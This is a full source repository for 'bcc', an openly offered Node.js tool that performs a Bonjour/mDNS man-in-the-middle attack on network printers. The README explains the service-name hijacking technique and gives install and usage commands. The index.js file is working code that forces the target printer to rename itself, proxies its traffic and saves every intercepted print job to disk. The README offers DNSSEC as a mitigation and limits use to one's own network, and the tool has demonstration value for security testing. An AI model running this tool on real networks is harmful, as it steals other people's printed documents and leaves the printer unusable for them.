├── .gitignore ├── .travis.yml ├── LICENSE ├── README.md ├── index.js └── package.json /.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | language: node_js 2 | node_js: 3 | - '4' 4 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 Thomas Watson Steen 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Blind Carbon Copy 2 | 3 | [![Build status](https://travis-ci.org/watson/bcc.svg?branch=master)](https://travis-ci.org/watson/bcc) 4 | [![js-standard-style](https://img.shields.io/badge/code%20style-standard-brightgreen.svg?style=flat)](https://github.com/feross/standard) 5 | 6 | This is an example of a [Bonjour/Zeroconf](http://www.zeroconf.org) 7 | [Man-in-the-Middle 8 | attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). This 9 | software showcases the attack of an 10 | [IPP](https://en.wikipedia.org/wiki/Internet_Printing_Protocol) enabled 11 | printer. It will intercept all print jobs sent to the target printer. 12 | 13 | This attack only works for Bonjour/Zeroconf and IPP enabled printers. 14 | Only jobs sent from clients that have the printer configured using 15 | Bonjour/Zeroconf will have their jobs intercepted. 16 | 17 | This software uses network conncted printers as an example target, but 18 | the vulnerability is an inherent feature of the underlying Multicast DNS 19 | standard ([RFC 6762](http://tools.ietf.org/html/rfc6762)) used by 20 | Bonjour/Zeroconf, so all services relying on this standard may be 21 | affected - not only printers. 22 | 23 | #### Solutions 24 | 25 | Aside from disabling Bonjour/Zeroconf on the printer, one possible way 26 | to secure your network from this sort of attack is by utilizing DNSSEC 27 | ([RFC 4033](http://tools.ietf.org/html/rfc4033)). How to do this is 28 | beyond the scope of this document. 29 | 30 | ## Disclaimer 31 | 32 | Use this software only to test the vulnerability of your own network 33 | printers. **Do not use this on networks you do not own without prior 34 | permission.** 35 | 36 | ## Attack Explained 37 | 38 | The attack relies on the fact that Bonjour/Zeroconf uses the Service 39 | Instance Name of a service as the unique key. Clients configured to 40 | connect to a service named `ServiceName` will do so even if the service 41 | changes its host and port. 42 | 43 | The attack works by forcing a name-change on the target service and 44 | updating all clients to connect to a different service controlled by the 45 | attacker: 46 | 47 | 1. An attacker advertises a service on the local network with the same 48 | properties as the target service except for the host and port which 49 | is replaced with its own 50 | 1. The target service will discover that another service is using its 51 | name and will rename itself to resolve the conflict (usually by 52 | appending a digit to the end of its name: `ServiceName` to 53 | `ServiceName-1`) 54 | 1. Simultaneously all clients on the network who've been configured to 55 | connect to `ServiceName` will now see that the service have changed 56 | host and port and will change their settings to connect to the new 57 | host/port controlled by the attacker 58 | 1. Since all requests to `ServiceName` are now sent to the attacker 59 | instead of the target, it can effectively act as a Man-in-the-Middle 60 | by proxying all requests to the target service 61 | 62 | ## Installation 63 | 64 | This software is written in Node.js and can be installed using the npm 65 | package manager. Ensure that you've [downloaded](https://nodejs.org) and 66 | installed Node.js before continuing. 67 | 68 | Install the `bcc` program globally: 69 | 70 | ``` 71 | npm install bcc -g 72 | ``` 73 | 74 | ## Usage 75 | 76 | Run `bcc` from the command line and select the target from the list of 77 | printers displayed: 78 | 79 | ``` 80 | $ bcc 81 | ? Select a printer (use arrow keys) 82 | > HP LaserJet 4600 83 | Reception Color Printer 84 | ``` 85 | 86 | A name-change will now be forced on the selected printer and the `bcc` 87 | program will install it self as a proxy inbetween clients and the 88 | selected printer. 89 | 90 | When you quit the `bcc` program, no clients configured to connect to the 91 | selected printer will be able to print any more as the proxy is now off 92 | line and the actual printer have changed its name. 93 | 94 | ### Debug mode 95 | 96 | To see all operation headers sent to the printer, start `bcc` with the 97 | `--log=` command line argument: 98 | 99 | ``` 100 | $ bcc --log=bcc.log 101 | ``` 102 | 103 | ## License 104 | 105 | MIT 106 | -------------------------------------------------------------------------------- /index.js: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env node 2 | 'use strict' 3 | 4 | var fs = require('fs') 5 | var util = require('util') 6 | var pump = require('pump') 7 | var menu = require('appendable-cli-menu') 8 | var log = require('single-line-log').stdout 9 | var chalk = require('chalk') 10 | var bonjour = require('bonjour')() 11 | var spy = require('ipp-spy') 12 | var gunzip = require('gunzip-maybe') 13 | var peek = require('peek-stream') 14 | var isPostScript = require('is-postscript') 15 | var isPjl = require('is-pjl') 16 | var isPdf = require('is-pdf') 17 | var C = require('ipp-encoder/constants') 18 | 19 | var logFile = (process.argv[2] || '').split('=') 20 | logFile = logFile[0] === '--log' ? logFile[1] : null 21 | 22 | var printers = menu('Select a printer', function (printer) { 23 | browser.stop() 24 | hijack(printer) 25 | }) 26 | 27 | var browser = bonjour.find({ type: 'ipp' }, function (printer) { 28 | printers.add({ name: printer.name, value: printer }) 29 | }) 30 | 31 | function hijack (printer) { 32 | var state = { printer: printer, ops: 0, docs: [] } 33 | render(state) 34 | 35 | var opts = { 36 | port: 3001, 37 | forwardHost: printer.host, 38 | forwardPort: printer.port 39 | } 40 | 41 | spy(opts, function (operation, doc) { 42 | if (logFile) { 43 | fs.appendFileSync(logFile, 44 | '-------------------------------------------\n' + 45 | util.inspect(operation, { depth: null }) + '\n') 46 | } 47 | 48 | state.ops++ 49 | render(state) 50 | 51 | if (operation.operationId === C.PRINT_JOB || operation.operationId === C.SEND_DOCUMENT) { 52 | var file = toFile('job-' + Date.now()) 53 | pump(doc, gunzip(), file, function (err) { 54 | if (err) throw err 55 | state.docs.push(file.name) 56 | render(state) 57 | }) 58 | } 59 | }) 60 | 61 | bonjour.publish({ type: printer.type, name: printer.name, port: 3001, txt: printer.txt, probe: false }) 62 | } 63 | 64 | function toFile (name) { 65 | var stream = peek({ newline: false, maxBuffer: 10 }, function (data, swap) { 66 | if (isPostScript(data)) name += '.ps' 67 | else if (isPjl(data)) name += '-pjl.ps' // Preview.app on OS X will be able to read some PJL documents if opened as .ps 68 | else if (isPdf(data)) name += '.pdf' 69 | else name += '.bin' 70 | stream.name = name 71 | swap(null, fs.createWriteStream(name)) 72 | }) 73 | return stream 74 | } 75 | 76 | function render (state) { 77 | var len = state.docs.length 78 | log('Target printer: ' + chalk.yellow(state.printer.name) + chalk.grey(' [' + state.printer.host + ':' + state.printer.port + ']\n') + 79 | 'Requests intercepted: ' + chalk.green(state.ops) + '\n' + 80 | 'Documents printed: ' + chalk.green(len) + '\n' + 81 | 'Latest document: ' + (len ? chalk.cyan(state.docs[len - 1]) : chalk.grey('waiting...')) + '\n') 82 | } 83 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "bcc", 3 | "version": "1.2.0", 4 | "description": "An IPP tool to Man-in-the-Middle all traffic to a local printer", 5 | "bin": "index.js", 6 | "dependencies": { 7 | "appendable-cli-menu": "^1.1.0", 8 | "bonjour": "^3.2.0", 9 | "chalk": "^1.1.1", 10 | "gunzip-maybe": "^1.3.0", 11 | "ipp-encoder": "^5.0.0", 12 | "ipp-spy": "^1.0.0", 13 | "is-pdf": "^1.0.0", 14 | "is-pjl": "^1.0.0", 15 | "is-postscript": "^1.0.0", 16 | "peek-stream": "^1.1.1", 17 | "pump": "^1.0.1", 18 | "single-line-log": "^1.0.1" 19 | }, 20 | "devDependencies": { 21 | "standard": "^5.4.1" 22 | }, 23 | "scripts": { 24 | "test": "standard" 25 | }, 26 | "repository": { 27 | "type": "git", 28 | "url": "git+https://github.com/watson/bcc.git" 29 | }, 30 | "keywords": [ 31 | "ipp", 32 | "print", 33 | "printer", 34 | "intercept", 35 | "man-in-the-middle", 36 | "MITM", 37 | "MIM", 38 | "MITMA", 39 | "attack", 40 | "dns-sd", 41 | "dnssd", 42 | "bonjour", 43 | "zeroconf" 44 | ], 45 | "author": "Thomas Watson Steen (https://twitter.com/wa7son)", 46 | "license": "MIT", 47 | "bugs": { 48 | "url": "https://github.com/watson/bcc/issues" 49 | }, 50 | "homepage": "https://github.com/watson/bcc#readme", 51 | "preferGlobal": true, 52 | "coordinates": [ 53 | 52.49312219999999, 54 | 13.4230795 55 | ] 56 | } 57 | --------------------------------------------------------------------------------